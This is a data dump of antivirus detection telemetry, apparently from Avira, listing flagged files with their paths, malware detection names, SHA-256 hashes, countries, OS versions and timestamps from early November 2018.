  Row(detection=Row(filename='avscan-20181102-054044-cfc5c556', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054044-CFC5C556', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060603-59a3dbcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060603-59A3DBCF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051307-f409d617', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051307-F409D617', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055345-a1649983', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055345-A1649983', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='7d3b3b7dd8a1433488fe97914613de0b3f0141c1c9d716c7c0f3b6ddcba70f01', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T03:46:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050611-fc7ca85e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050611-FC7CA85E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:53:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053348-d7f5be2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053348-D7F5BE2F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aff5164e19a594d6aa5f1376f1f6687fb7cd7eb5', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\aff5164e19a594d6aa5f1376f1f6687fb7cd7eb5', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='774f71ae96387e84a4b56cf01c3186a19b5e245e2da0a01daa8dc1af23751abb', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:25:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\Dany\\AppData\\Local\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='85b2a4f1594c8b1c4b5899805517daf76fdf97ae31efe7caf45408440e785652', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:53:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062330-c94e0588', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062330-C94E0588', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054805-d6e20405', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054805-D6E20405', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054852-f2fa3a8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054852-F2FA3A8F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051749-9c31c5d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051749-9C31C5D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061550-b755642a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061550-B755642A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054404-46e5a672', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054404-46E5A672', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060930-d49e6b13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060930-D49E6B13', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:10:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061539-b09bedbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061539-B09BEDBD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050617-ffbd196b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050617-FFBD196B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051141-c0f23917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051141-C0F23917', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051742-9823aff3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051742-9823AFF3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053800-6e3f1163', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053800-6E3F1163', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062144-8a4c04f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062144-8A4C04F7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061548-b603fbc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061548-B603FBC7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T11:00:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131715-e433cb5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c0c797b1\\AVSCAN-20181102-125319-1BA0D82E\\AVSCAN-20181102-131715-E433CB5F', filesize=64000, name='TR/Agent.64000.113.#M1.#R1'), hash='868ea59cf41b3a44f3ab0bd6804fac4ab84448d17a297e3c8c5e0e3682ec944f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:17:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050516-dba87430', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050516-DBA87430', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lpa.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\LPA\\LPA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:35:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\20D8EEE609BD1C6053B4D278F95AECEFBA2B7210BC971F0AE513ED2E0C644479', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='20d8eee609bd1c6053b4d278f95aecefba2b7210bc971f0ae513ed2e0c644479', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:23:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (5).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (5).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-01T23:46:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T23:19:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180646-7eaba7bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180415-636910FF\\AVSCAN-20181101-180646-7EABA7BC', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:06:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:07:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-01-20-16-02.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-28T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-01T20:22:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0358770.exe', filepath='\\\\?\\C:\\System Volume Information\\_restore{93F7CC16-D4B7-42F9-9F19-AAFEFA01B068}\\RP1567\\A0358770.exe', filesize=1548000, name='ADWARE/BrowseFox.Gen.#M300.#R6112'), hash='1f74394739fdf5619ded0f415d8bd61e3b708e64b6e2840f9672ef3571f19c25', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:58:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152510-3f5b9df2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152510-3F5B9DF2', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T13:19:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155644-c91c9664', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155644-C91C9664', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pisah data.exe', filepath='D:\\DATA_SHARE\\audit\\pisah data\\pisah data.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160102-f497bc63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160102-F497BC63', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154720-6a335e08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154720-6A335E08', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155006-862a76a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155006-862A76A7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='230881192938357.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\230881192938357.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160127-f8ed3147', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160127-F8ED3147', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-26T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-01T07:37:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T22:13:47Z'), dt=datetime.date(2018, 11, 1)),
